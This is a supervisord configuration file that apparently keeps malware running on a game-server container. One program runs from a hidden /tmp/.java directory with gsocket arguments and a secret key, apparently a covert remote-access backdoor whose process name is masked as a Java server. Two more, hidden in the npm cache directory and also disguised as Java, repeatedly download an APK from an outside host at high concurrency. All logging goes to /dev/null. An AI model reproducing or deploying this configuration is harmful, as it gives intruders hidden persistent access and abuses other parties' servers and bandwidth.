[supervisord]
logfile=/dev/null

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i6C7A0e9A2c--C9F0d6A2-k8A1C5J1g7-0A6f3D9g4H7bJ7-5C4F9e1 -liq"
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true

[program:p0]
directory=/home/container/.npm/_cacache/content-v2/sha512/.cache
command=./paper.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./server.jar -c 4000 -s https://d.kanzhun.com/boss/latest/64/directhires_c0.apk
autorestart = true
stdout_logfile=/dev/null

[program:p1]
directory=/home/container/.npm/_cacache/content-v2/sha512/.cache
command=./paper.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./server.jar -c 2000 -s https://d.kanzhun.com/boss/latest/directhires_c0.apk
autorestart = true
stdout_logfile=/dev/null